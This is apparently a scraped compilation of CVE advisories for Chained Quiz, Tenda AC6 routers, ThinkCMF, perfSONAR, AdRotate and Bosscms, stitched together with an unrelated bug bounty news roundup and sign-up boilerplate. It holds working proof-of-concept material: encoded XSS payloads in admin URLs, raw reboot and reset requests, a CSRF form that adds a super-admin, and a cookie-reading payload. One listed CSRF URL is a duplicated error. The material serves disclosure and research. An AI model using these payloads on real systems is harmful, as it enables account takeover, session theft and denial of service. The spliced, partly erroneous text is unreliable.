The Chained Quiz plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.3.2.4. This is due to missing nonce validation on the list_questions() function. This makes it possible for unauthenticated attackers to delete questions from quizzes via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.

**WordPress plugin Chained Quiz <= 1.3.2 multiple vulnerabilities**

**Author: Muhammad Zeeshan (Xib3rR4dAr)**  
Date: November 24, 2022

**XSS**

**Description:**  
Multiple endpoints are vulnerable to XSS. When a logged in admin will visit a URL shared by an attacker, XSS will trigger which can be exploited to add a new admin user on website. sanitize_text_field is used while esc_attr should've been used.

**Vulnerable Files:**

    chained-quiz/controllers/completed.php
    chained-quiz/views/completed.html.php
    and more
    

**Payload:**

" onmouseover=alert(1) style=position:absolute;width:100%;height:100%;top:0;left:0; a

**URL Encoded Payload:**

%22%20onmouseover%3Dalert(1)%20style%3Dposition%3Aabsolute%3Bwidth%3A100%25%3Bheight%3A100%25%3Btop%3A0%3Bleft%3A0%3B%20a

**PoC:**  
While logged in as admin, visiting following crafted requests will trigger XSS:

    /wp-admin/admin.php?page=chainedquiz_list&quiz_id=1&ob=datetime&dir=desc&dn=&dnf=&email=&emailf=&ip=&ipf=&date=&datef=%22%20onmouseover%3Dalert(1)%20style%3Dposition%3Aabsolute%3Bwidth%3A100%25%3Bheight%3A100%25%3Btop%3A0%3Bleft%3A0%3B%20a&points=&pointsf=&result_id=0&source_url=
    
    /wp-admin/admin.php?page=chainedquiz_list&quiz_id=1&ob=datetime&dir=desc&dn=&dnf=&email=&emailf=&ip=&ipf=&date=&datef=&points=&pointsf=%22%20onmouseover%3Dalert(1)%20style%3Dposition%3Aabsolute%3Bwidth%3A100%25%3Bheight%3A100%25%3Btop%3A0%3Bleft%3A0%3B%20a&result_id=0&source_url=
    
    /wp-admin/admin.php?page=chainedquiz_list&quiz_id=1&ob=datetime&dir=desc&dn=%22%20onmouseover%3Dalert(1)%20style%3Dposition%3Aabsolute%3Bwidth%3A100%25%3Bheight%3A100%25%3Btop%3A0%3Bleft%3A0%3B%20a&dnf=&email=&emailf=&ip=&ipf=&date=&datef=&points=&pointsf=&result_id=0&source_url=
    
    /wp-admin/admin.php?page=chainedquiz_list&quiz_id=1&ob=datetime&dir=desc&dn=&dnf=%22%20onmouseover%3Dalert(1)%20style%3Dposition%3Aabsolute%3Bwidth%3A100%25%3Bheight%3A100%25%3Btop%3A0%3Bleft%3A0%3B%20a&email=&emailf=&ip=&ipf=&date=&datef=&points=&pointsf=&result_id=0&source_url=
    
    /wp-admin/admin.php?page=chainedquiz_list&quiz_id=1&ob=datetime&dir=desc&dn=&dnf=&email=&emailf=%22%20onmouseover%3Dalert(1)%20style%3Dposition%3Aabsolute%3Bwidth%3A100%25%3Bheight%3A100%25%3Btop%3A0%3Bleft%3A0%3B%20a&ip=&ipf=&date=&datef=&points=&pointsf=&result_id=0&source_url=
    
    /wp-admin/admin.php?page=chainedquiz_list&quiz_id=1&ob=datetime&dir=desc&dn=&dnf=&email=&emailf=&ip=%22%20onmouseover%3Dalert(1)%20style%3Dposition%3Aabsolute%3Bwidth%3A100%25%3Bheight%3A100%25%3Btop%3A0%3Bleft%3A0%3B%20a&ipf=&date=&datef=&points=&pointsf=&result_id=0&source_url=
    
    /wp-admin/admin.php?page=chainedquiz_list&quiz_id=1&ob=datetime&dir=desc&dn=&dnf=&email=&emailf=&ip=&ipf=%22%20onmouseover%3Dalert(1)%20style%3Dposition%3Aabsolute%3Bwidth%3A100%25%3Bheight%3A100%25%3Btop%3A0%3Bleft%3A0%3B%20a&date=&datef=&points=&pointsf=&result_id=0&source_url=
    
    /wp-admin/admin.php?page=chainedquiz_list&quiz_id=1&ob=datetime&dir=desc&dn=&dnf=&email=&emailf=&ip=&ipf=&date=%22%20onmouseover%3Dalert(1)%20style%3Dposition%3Aabsolute%3Bwidth%3A100%25%3Bheight%3A100%25%3Btop%3A0%3Bleft%3A0%3B%20a&datef=&points=&pointsf=&result_id=0&source_url=
    

Similarly, other endpoints in the plugin are also vulnerable to Admin Stored XSS even if DISALLOW_UNFILTERED_HTML is set to true, some are:

*   Visit \[Social Sharing page\](http://example.com/wp-admin/admin.php?page=chainedquiz\_social\_sharing as admin) and set Facebook App ID input to: " onclick=alert(1) a
*   Visit Integrations page as admin and set MailChimp API Key to : " onclick=alert(1) a  
    XSS will trigger when input box will be clicked, or when page is hovered depending on XSS payload that is used.

    POST /wp-admin/admin.php?page=chainedquiz_social_sharing
    ...
    facebook_appid=" onclick=alert(1) a
    
    POST /wp-admin/admin.php?page=chainedquiz_integrations&tab=mailchimp
    ...
    api_key=someapikey" onclick=alert(1) a
    

**CSRF**

Delete a quiz:

    /wp-admin/admin.php?page=chained_quizzes&del=1&id=2
    

Delete submitted responses:

    /wp-admin/admin.php?page=chainedquiz_list&quiz_id=1&offset=0&ob=tC.id&dir=desc&del=5
    

Delete a question from a quiz:

    /wp-admin/admin.php?page=chainedquiz_questions&quiz_id=1&del=1&id=1
    

Copy Quiz:

    /wp-admin/admin.php?page=chainedquiz_questions&quiz_id=1&del=1&id=1

CVE-2022-4220: WP plugin Chained Quiz multiple vulnerabilities

Tenda AC6V1.0 V15.03.05.19 is vulnerable to Cross Site Request Forgery (CSRF) via function fromSysToolReboot.

Tenda Router **AC6V1.0 V15.03.05.19** is vulnerable to Cross Site Request Forgery (CSRF) via function fromSysToolReboot

This vulnerability lies in the /goform/SysToolReboot page，The details are shown below:

This POC can result in a Dos.

    GET /goform/SysToolReboot HTTP/1.1
    Host: 192.168.204.133
    Content-Length: 11525
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://192.168.204.133
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://192.168.204.133/system_hostname.asp?version=1487847846
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: bLanguage=cn; password=jbl1qw; user=
    Connection: close

CVE-2022-45674: VulnerabilityProjectRecords/fromSysToolReboot.md at main · iceyjchen/VulnerabilityProjectRecords

Tenda AC6V1.0 V15.03.05.19 is vulnerable to Cross Site Request Forgery (CSRF) via function fromSysToolRestoreSet.

Tenda Router **AC6V1.0 V15.03.05.19** is vulnerable to Cross Site Request Forgery (CSRF) via function fromSysToolRestoreSet

This vulnerability lies in the /goform/fromSysToolRestoreSet page，The details are shown below:

This POC can result in a Dos.

    GET /goform/SysToolRestoreSet HTTP/1.1
    Host: 192.168.204.133
    Content-Length: 11525
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://192.168.204.133
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://192.168.204.133/system_hostname.asp?version=1487847846
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: bLanguage=cn; password=jbl1qw; user=
    Connection: close

CVE-2022-45673: VulnerabilityProjectRecords/fromSysToolRestoreSet.md at main · iceyjchen/VulnerabilityProjectRecords

New web targets for the discerning hacker

New web targets for the discerning hacker

Bug bounty platform HackerOne has launched a scheme to encourage customers to adopt a standard policy geared towards protecting hackers from potential legal problems.

The Gold Standard Safe Harbor (GSSH) is designed to be “short, broad, \[and\] easily-understood”, according to HackerOne.

Many bug bounty and vulnerability disclosure programs offer safe harbor agreements that allow hackers acting in good faith to do their thing. HackerOne’s standard policy is designed to collate best practices while reducing the administrative burden for hackers, who will have no need to scrutinize the terms and conditions of targets before looking for in-scope vulnerabilities.

European crowdsourced security platform Intigriti, meanwhile, has launched Bug Bounty Calculator, a tool designed to help bug bounty program owners pitch their payout rates at the appropriate level.

To generate reward suggestions program providers select their industry and describe their assets in terms of risk level, maturity level, and incentive curve.

Inti de Ceukelaire, head of hackers at Intigriti, explained why he built the tool: “Anyone can set up a bug bounty program, but if you aren’t sure what you’re doing, you may pay too much for vulnerabilities. Even worse, set your bounties too low and you may not attract any researchers at all.”

The maximum payout awards under a growing number of programs have reached $1 million and more. Earlier this week The Daily Swig took a closer look into these high potential reward programs and discovered that market forces, in particular a scarcity of skilled talent, are driving up the value of rewards offered.

Web 3.0 and crypto platforms, in particular, are competing to offer dazzlingly high potential rewards. However, experts questioned by The Daily Swig pointed out the rarity of firms in this arena actually paying out seven-figure sums, which suggests some are offering enormous potential bounties in an attempt to court publicity.

Against this are several examples of six-figure payouts by more established tech vendors such as Apple and Intel. However, HackerOne reports that the median payouts for critical vulnerabilities comes in at $3,000 – a figure worth bearing in mind by anyone tempted to quit their day job in pursuit of greater riches on the bug bounty circuit.

An example of an interesting flaw on the lower end of the scale dropped early in November when a researcher revealed that they had earned a $250 bug bounty payout after discovering a code injection flaw in Acronis’ cloud management console that could be abused for data theft.

On November 4, ‘Medi’ (under the alias ‘mr-medi’), published a technical analysis of the client-side path traversal flaw, which they described as the “favorite bug” they’d ever found.

**The latest bug bounty programs for December 2022**

The past month saw the arrival of several new bug bounty programs. Here’s a list of the latest entries:

**Abraxas (enhanced)**

**Program provider:  
**Bug Bounty Switzerland

**Program type:  
**Public

**Max reward:  
**CHF 30,000 ($26,167)

**Outline:  
**Abraxas, which provides IT services for the government and public sector in Switzerland, has tripled maximum payouts from 10,000 Swiss francs to 30,000 francs.

**Notes:  
**Program has a particular focus on vulnerabilities that could enable attackers to manipulate the outcome of Swiss elections.

Check out the Abraxas bug bounty page for more details

**Amber AI**

**Program provider:  
**HackerOne

**Program type:  
**Public

**Max reward:  
**$5,000

**Outline:  
**AMBER AI, a “crypto-finance service provider”, is offering between $2,500 and $5,000 for the submission of valid critical bugs.

**Notes:  
**Vulnerabilities in AMBER AI’s core business services qualify for the highest payout tier but the web 3.0 business is also interested in a wide range of web security vulnerabilities such as SQL injection, CSRF, and denial-of-service issues.

Check out the AMBER AI bug bounty page for more details

**Expedia Group**

**Program provider:  
**HackerOne

**Program type:  
**Public

**Max reward:  
**$5,000

**Outline:  
**Expedia runs a portfolio of travel websites that offer hotel, flight booking, and more.

**Notes:  
**A range of targets are in scope including hotels.com. orbitz.com, and expedia.com.

Check out the Expedia Group bug bounty page for more details

**Magic Eden**

**Program provider:  
**HackerOne

**Program type:  
**Public

**Max reward:  
**$2,500

**Outline:  
**Magic Eden styles itself as a community-centric NFT marketplace.

**Notes:  
**The bug bounty program is focused on smart contracts and on guarding against the freezing of funds, direct theft, denial of business function, or other attacks that interfere with the smooth operation of the marketplace.

Check out the Magic Eden bug bounty page for more details

**Teleport**

**Program provider:  
**HackerOne

**Program type:  
**Public

**Max reward:  
**$5,000

**Outline:**

Teleport offers open source technology based around the zero trust model and designed for the administration of servers and cloud-based applications.

**Notes:  
**Vulnerabilities in both the on-premises software and cloud-based versions of Teleport’s technologies fall within the scope of the program.

Check out the Teleport bug bounty page for more details

**ThousandEyes**

**Program provider:  
**Bugcrowd

**Program type:  
**Public

**Max reward:  
**$4,500

**Outline:  
**ThousandEyes, which offers network intelligence software, has invited elite hackers to probe five targets for security flaws.

**Notes:  
**In-scope targets include ThousandEyes' website, application platform, customer-accessible API, and enterprise and agent software. The firm reopened its previously dormant bug bounty program in late November.

Check out the ThousandEyes bug bounty page for more details

**ZeroBounce**

**Program provider:  
**HackerOne

**Program type:  
**Public

**Max reward:  
**$3,000

**Outline:  
**ZeroBounce offers email marketing services, targeted towards the needs of enterprise customers.

**Notes:  
**A broad array of web security vulnerability (such as XSS) on the zerobounce.in domain and flaws in the associated API library (api.zerobounce.in) are within scope.

Check out the ThousandEyes bug bounty page for more details

PREVIOUS EDITION Bug Bounty Radar // The latest bug bounty programs for November 2022

Bug Bounty Radar // The latest bug bounty programs for December 2022

ThinkCMF version 6.0.7 is affected by Stored Cross-Site Scripting (XSS). An attacker who successfully exploited this vulnerability could inject a Persistent XSS payload in the Slideshow Management section that execute arbitrary JavaScript code on the client side, e.g., to steal the administrator's PHP session token (PHPSESSID).

ThinkCMF version 6.0.7 is vulnerable to Stored Cross-Site Scripting. More precisely, the component that manages the slideshows allows you to insert HTML tags and JavaScript code in the Name field.

Here are the steps to reproduce the issue.

Note that with this issue a remote user can steal the administrator's session cookie (PHPSESSID).

These are the PoCs I used.

    <html>
      <body>
      <h1>CSRF - XSS Stored PoC</h1>
      <script>history.pushState('', '', '/')</script>
        <form action="http://localhost/admin/slide/addPost.html" method="POST">
          <input type="hidden" name="name" value="&lt;audio&#47;src&#47;onerror&#61;alert&#40;0&#41;&gt;" />
          <input type="hidden" name="remark" value="XSS&#32;Stored" />
          <input type="submit" value="Submit request" />
        </form>
        <script>
          //document.forms[0].submit();
        </script>
      </body>
    </html>
    

    <html>
      <body>
      <h1>CSRF - XSS Stored PoC</h1>
      <script>history.pushState('', '', '/')</script>
        <form action="http://localhost/admin/slide/addPost.html" method="POST">
          <input type="hidden" name="name" value="&lt;audio&#47;src&#47;onerror&#61;alert&#40;document.cookie&#41;&gt;" />
          <input type="hidden" name="remark" value="XSS&#32;Stored" />
          <input type="submit" value="Submit request" />
        </form>
        <script>
          //document.forms[0].submit();
        </script>
      </body>
    </html>
    

  
_Fig. 1: CSRF that contains an XSS payload_

  
_Fig.2: CSRF payload triggered_

  
_Fig. 3: XSS payload injected_

  
_Fig. 4: XSS triggered_

  
_Fig. 5: Reading the PHPSESSID cookie_

CVE-2022-40849: XSS Stored in the Slideshow Management component. · Issue #737 · thinkcmf/thinkcmf

ThinkCMF version 6.0.7 is affected by a Cross Site Request Forgery (CSRF) vulnerability that allows a Super Administrator user to be injected into administrative users.

Hi,  
I found a CSRF in ThinkCMF version 6.0.7 that allows a remote user to add a Super Admin account by taking advantage of the session of an administrator who is logged into the system. Below are the steps to reproduce this issue.

    <html>
      <body>
      <h1>CSRF - SuperAdmin User Creation</h1>
      <script>history.pushState('', '', '/')</script>
        <form action="http://localhost/admin/user/addpost.html" method="POST">
          <input type="hidden" name="user_login" value="SuperAdmin" />
          <input type="hidden" name="user_pass" value="SuperAdmin999qweasd" />
          <input type="hidden" name="user_email" value="superadmin&#64;yopmail&#46;com" />
          <input type="hidden" name="role_id&#91;&#93;" value="2" />
          <input type="hidden" name="role_id&#91;&#93;" value="1" />
          <input type="submit" value="Submit request" />
        </form>
        <script>
          //document.forms[0].submit();
        </script>
      </body>
    </html>
    

  
_Fig. 1: Vulnerable page_

  
_Fig. 2: CSRF Payload_

  
_Fig. 3: CSRF Payload Executed_

  
_Fig. 4: Super Admin account added_

  
_Fig. 5: Super Admin logged in_

CVE-2022-40489: I found a CSRF that creates a Super Admin account. · Issue #736 · thinkcmf/thinkcmf

A partial blind cross site request forgery (CSRF) vulnerability exists in perfSONAR versions 4.x through 4.4.5 within the /perfsonar-graphs/ test results page. Parameters and values can be injected/passed via the URL parameter, forcing the client to connect unknowingly in the background to other sites via transparent XMLHTTPRequests. This partial blind CSRF bypasses the built-in whitelisting function in perfSONAR.

perfSONAR 4.4.5 Cross Site Request Forgery

Cross-Site Request Forgery (CSRF) in AdRotate Banner Manager Plugin <= 5.9 on WordPress.

**Solution**

Timeline: 6 July 2022 - first contact with the vendor. 6 July 2022 - vendor replied, and vulnerability details were sent. 11 November 2022 - still unpatched, vulnerability publicly disclosed. 15 November 2022 - the patched version was released. Update the WordPress AdRotate Banner Manager plugin to the latest available version (at least 5.9.1).

Muhammad Daffa discovered and reported this Cross Site Request Forgery (CSRF) vulnerability in WordPress AdRotate Banner Manager Plugin. This could allow a malicious actor to force higher privileged users to execute unwanted actions under their current authentication. For example a password change which will then allow the malicious actor to login into the admin account. This vulnerability has been fixed in version 5.9.1.

**6 other known vulnerabilities for this plugin**To plugin page

**Report to Patchstack Alliance bounty platform and earn monthly cash prizes.**

Learn more

CVE-2022-26366: WordPress AdRotate Banner Manager plugin <= 5.9 - Multiple Cross-Site Request Forgery (CSRF) vulnerabilities - Patchstack

perfSONAR v4.x <= v4.4.5 was discovered to contain a Cross-Site Request Forgery (CSRF) which is triggered when an attacker injects crafted input into the Search function.

Vendor: perfSONAR  
Link: https://github.com/perfsonar/  
Affected Versions: v4.x <= v4.4.5  
Vulnerability Type: Partial Blind CSRF  
Discovered by: Ryan Moore  
CVE: CVE-2022-41413

**Summary**

A partial blind CSRF vulnerability exists in perfSONAR v4.x <= v4.4.5 within the /perfsonar-graphs/ test results page. Parameters and values can be injected/passed via the URL parameter, forcing the client to connect unknowingly in the background to other sites via transparent XMLHTTPRequests. This partial blind CSRF bypasses the built-in whitelisting function in perfSONAR.

This vulnerability was patched in perfSONAR v4.4.6.  

**Proof of Concept****Examples**

Here are two examples of this vulnerability. For further details, review the Technical Overview section below.

**Example 1:**

Client browser connects to www.google.com in the background.  
http://192.168.68.145/perfsonar-graphs/?source=1&dest=2&url=https://www.google.com

**Example 2:**

Client browser connects to arbitrary IP and port in the background, passing delete parameter to /api endpoint.  
http://192.168.68.145/perfsonar-graphs/?source=8.8.8.8&dest=%26action%3Ddelete&url=http://192.168.68.113:4444/api

**Technical Overview**

In these examples, the graphs.json whitelist was enabled by uncommenting url\_whitelist. By uncommenting these, it enables whitelisting and perfSONAR should no longer be allowed to connect to sites not found in the whitelist. But unfortunately that was not the case.

**Example 1:**

With the whitelist enabled and navigating to the following URL, the site returns “URL is not whitelisted” output to the screen as intended. This is to prevent you from connecting to unwanted sites.

http://192.168.68.145/perfsonar-graphs/?source=1&dest=2&url=https://www.google.com

But, if you observe via the browser developer console (or via a web proxy), there is a Jquery module that forces the client to make transparent requests in the background to whatever URL was specified.

Open your web browser, right click, Inspect, and go to Network. Now with Inspect open, navigate to the same URL and observe. In the background, you will see requests from the client to the URL that was specified, in this case www.google.com.

http://192.168.68.145/perfsonar-graphs/?source=1&dest=2&url=https://www.google.com

To compound this issue, it was discovered that URL encoded parameters could be injected into the dest parameter value and passed to the XMLHTTPRequests. This allows us to inject parameters into the GET request URI and send those as a CSRF attack to the URL of our choosing (transparently in the background).

For example purposes, here we will use the https://www.google.com/search URL and inject the q=csrf parameter and value, which tells Google what to search for. We open the following URL from our browser with Inspect open, to observe the transparent connection and search to Google.

http://192.168.68.145/perfsonar-graphs/?source=1&dest=s%3Dcsrf2&url=https://www.google.com

Fortunately Google and CORS prevents the query from working, but the site still connects to Google (or any site specified) without the user knowing, transparently in the background. Many sites have CSRF protections, but some do not. Now I will start a web server on another host and demonstrate how the CSRF attack might be used to attack other sites.

**Example 2:**

Here we are using another internal web server for testing. We simulate an API with a delete function. While the web server is listening on another internal machine, we open the following URL in the victim’s browser.

http://192.168.68.145/perfsonar-graphs/?source=8.8.8.8&dest=%26action%3Ddelete&url=http://192.168.68.113:4444/api

Here we observe the web server output, you can see the requests coming from the client. Notice the third line down, you can see the parameter injection worked correctly, we have sent the action=delete parameter to the /api endpoint on the designated server. (In this case fictitious for demonstration purposes).

This CSRF attack is unauthenticated by default, unrestricted, and the existing whitelist mechanism does not protect against it.

**Remediation**

Update perfSONAR to v4.4.6 or newer.

**References**

*   https://lists.internet2.edu/sympa/arc/perfsonar-user/2022-11/msg00008.html
*   https://www.perfsonar.net/releasenotes-2022-11-09-4-4-6.html
*   https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41413

CVE-2022-41413: GitHub - renmizo/CVE-2022-41413

Bosscms v2.0.0 was discovered to contain a Cross-Site Request Forgery (CSRF) via the Add function under the Administrator List module.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Tag

#csrf